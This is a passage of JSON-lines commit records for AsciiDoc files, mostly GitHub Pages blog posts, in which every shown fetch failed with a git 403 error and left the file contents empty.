403\n","license":"mit","lang":"AsciiDoc"} {"commit":"618a3f898e1d97245739e09350bd4d4f2ea8f597","subject":"Update 2017-04-03-Reflexive-Stormechanismen.adoc","message":"Update 2017-04-03-Reflexive-Stormechanismen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-03-Reflexive-Stormechanismen.adoc","new_file":"_posts\/2017-04-03-Reflexive-Stormechanismen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6bfd77fb408b7daa4fb231073fe99ed7a5c5e3","subject":"y2b create post Apple Watch - Will It Scratch?","message":"y2b create post Apple Watch - Will It Scratch?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-21-Apple-Watch--Will-It-Scratch.adoc","new_file":"_posts\/2015-04-21-Apple-Watch--Will-It-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30d963c2744471b23a93c9bb53a682a57631db9d","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4d5452ed4313b1a00c295ae9d373e1f65116fbd","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"888fee58c29b34c0c2cd150b365406e6d0756975","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a5e377e8cf7cd97f1ed58c91a58b420e2deee3b","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"994762e7ec777364eada9fd6b785f21facf4f568","subject":"Update 2015-09-10-st-pierre.adoc","message":"Update 2015-09-10-st-pierre.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-10-st-pierre.adoc","new_file":"_posts\/2015-09-10-st-pierre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aedd3be841351e717c17a2cfe5c6c863108eb04","subject":"Add type conversion functions CIP","message":"Add type conversion functions CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-07-07-Type-conversion-functions.adoc","new_file":"cip\/CIP2016-07-07-Type-conversion-functions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05d41b9bd95703b5e043aa074f61ec6a6108cf02","subject":"Update 2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","message":"Update 2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","repos":"olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io","old_file":"_posts\/2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","new_file":"_posts\/2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olavloite\/olavloite.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ea066fe20570482b43355f71ccb2b8079df4f00","subject":"create post The Best Wireless Headphones You Can Buy Right Now","message":"create post The Best Wireless Headphones You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_file":"_posts\/2018-02-26-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce0eb6d58b68a7da25a0ae56ae69ac9993be8e47","subject":"auth.path instead of auth.pass and grammar","message":"auth.path instead of auth.pass and grammar\n","repos":"girirajsharma\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yonglehou\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68fab4fe5a889bc8583da5199f09ae43e9dbefae","subject":"y2b create post Crazy iPhone Knife Case!","message":"y2b create post Crazy iPhone Knife Case!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-30-Crazy-iPhone-Knife-Case.adoc","new_file":"_posts\/2014-07-30-Crazy-iPhone-Knife-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32dc70de9937509e9b23cc70d7508d6deca963a7","subject":"y2b create post 3 Cool Gadgets Under $10","message":"y2b create post 3 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-09-3-Cool-Gadgets-Under-10.adoc","new_file":"_posts\/2017-04-09-3-Cool-Gadgets-Under-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04a39651ec21e6eb5083d359efbc30fdc8affe21","subject":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f850c93bd7ce8a0ef781ca89fae962b1e06e3815","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ef8d3281a7507c523c4b37bfabbd929ecb8dfc","subject":"Add badge to readme file that shows the docker image size, # of layers and the latest released version (#144)","message":"Add badge to readme file that shows the docker image size, # of layers and the latest released version (#144)\n\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6bc5da898a9aa53a6bd788f9c089feaf0ae024f","subject":"\u52a0\u85e4 \u6295\u7a3f\u30d5\u30a1\u30a4\u30eb\u8ffd\u52a0","message":"\u52a0\u85e4 \u6295\u7a3f\u30d5\u30a1\u30a4\u30eb\u8ffd\u52a0\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-15-Kato-Google-App-Script.adoc","new_file":"_posts\/2016-04-15-Kato-Google-App-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a660d4f9061db80742ed19894358a3373584604","subject":"Update 2018-03-14-golanggolangphperphper.adoc","message":"Update 2018-03-14-golanggolangphperphper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-14-golanggolangphperphper.adoc","new_file":"_posts\/2018-03-14-golanggolangphperphper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b3fa8081ad1bc9311c9c2e8ac7e112a532cfef8","subject":"Add letsencrypt README","message":"Add letsencrypt README\n","repos":"10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups,10sr\/server-provisions,10sr\/machine-setups","old_file":"conoha\/roles\/letsencrypt\/README.adoc","new_file":"conoha\/roles\/letsencrypt\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"5c673ecad0ec5d27ba21678576cac95c1e6da948","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f99cb16c6bfeecc005c0ef159ccbcbdfb13d3008","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bc29e98aba665a21afa11d4c32d8ac11ebc972a","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7526cbccd7cd86a33c597273b63804c3e5853bb4","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5cac0009ac5a3182ec787c5e57b2592ad9842a1","subject":"Small updt proc Ex","message":"Small updt proc Ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c448a153862759840483b02b4871537d957651cd","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5518997e60ca1b7faf25758b40d4481f560f7184","subject":"chore(about-author): Twitter\u3078\u306e\u30ea\u30f3\u30af\u3092\u8ffd\u52a0","message":"chore(about-author): Twitter\u3078\u306e\u30ea\u30f3\u30af\u3092\u8ffd\u52a0\n","repos":"wangwei1237\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,azu\/promises-book,charlenopires\/promises-book,wenber\/promises-book,sunfurong\/promise,cqricky\/promises-book,liubin\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,purepennons\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,liubin\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,genie88\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,oToUC\/promises-book,mzbac\/promises-book,genie88\/promises-book,dieface\/promises-book,wenber\/promises-book,dieface\/promises-book,azu\/promises-book,genie88\/promises-book,dieface\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,azu\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,azu\/promises-book,purepennons\/promises-book","old_file":"Appendix-Glossary\/about-author.adoc","new_file":"Appendix-Glossary\/about-author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dfc0413654873b5b5c5ecdfca38ebdc5b081167","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce7c9c36bb11995bcc0fa067f6416e6bf7d3d0ec","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0204982754fc005c84526797c34f4685c0f23f5","subject":"y2b create post Holiday Gift Guide 2011","message":"y2b create post Holiday Gift Guide 2011","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-05-Holiday-Gift-Guide-2011.adoc","new_file":"_posts\/2011-12-05-Holiday-Gift-Guide-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0231837de4bccc5255d341d56b3e2a432dd51052","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fc18324111f2f842204f9cfe56a5d4241b39c2d","subject":"Update 2016-03-02-liste-questions-finance.adoc","message":"Update 2016-03-02-liste-questions-finance.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-02-liste-questions-finance.adoc","new_file":"_posts\/2016-03-02-liste-questions-finance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cfae637fbdfc95553defa6f8e007bd43a73603f","subject":"Renamed '_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc' to '_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc'","message":"Renamed '_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc' to '_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc","new_file":"_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5444eb7ff889055a124a0c62f750385a59f2fe71","subject":"Update 2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","message":"Update 2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","new_file":"_posts\/2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388ac1b238b523cab2306ef5293ea5fb8cdd8bc8","subject":"y2b create post These Crazy Sunglasses Do Something Incredible (Seriously)","message":"y2b create post These Crazy Sunglasses Do Something Incredible (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-01-These-Crazy-Sunglasses-Do-Something-Incredible-Seriously.adoc","new_file":"_posts\/2017-07-01-These-Crazy-Sunglasses-Do-Something-Incredible-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88b459dc9336e78365ccdbba55d8343eed5ec3d6","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a585a7335a560d2867e447fea7e193e2735f4194","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddba74251bc8c942cfeacb2cdd0cc3968fe2c652","subject":"Add tutorial to README","message":"Add tutorial to README\n","repos":"juxt\/edge,juxt\/edge","old_file":"tutorial.moan\/README.adoc","new_file":"tutorial.moan\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/edge.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb2f731dee88c8db40098fc6acbea7efc9e54364","subject":"Update 2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","message":"Update 2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","repos":"hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io","old_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hotfloppy\/hotfloppy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ab68677dfaf4eb6e860d57f9d1c5242e4ef3c60","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"809154017ef2edfd8260ba250a9893e815479d97","subject":"Fix docker run command for cassandra","message":"Fix docker run command for cassandra\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fd2c9ab89d28d543a76ca234a405eed8a656b613","subject":"Worked on BSM support","message":"Worked on BSM support\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/BSM event auditing file format.asciidoc","new_file":"documentation\/BSM event auditing file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"534a1577833e23728e07f6c5092822f118e64708","subject":"Update 2015-07-21-Whats-the-use-of-Monads.adoc","message":"Update 2015-07-21-Whats-the-use-of-Monads.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-21-Whats-the-use-of-Monads.adoc","new_file":"_posts\/2015-07-21-Whats-the-use-of-Monads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa3d2ca70b7047a63aebfecd6dad3ac55ce67a04","subject":"Update 2015-09-20-The-Box-Model-Challenge.adoc","message":"Update 2015-09-20-The-Box-Model-Challenge.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-09-20-The-Box-Model-Challenge.adoc","new_file":"_posts\/2015-09-20-The-Box-Model-Challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aa3fd574765c272c5f43b272cd5e656986123a7","subject":"Update 2018-01-30-the-digital-blind-faith.adoc","message":"Update 2018-01-30-the-digital-blind-faith.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-the-digital-blind-faith.adoc","new_file":"_posts\/2018-01-30-the-digital-blind-faith.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56d2bbdef3da3283a16463c667fe4aaa732f5ef9","subject":"Update 2018-05-25-Architect-Certification.adoc","message":"Update 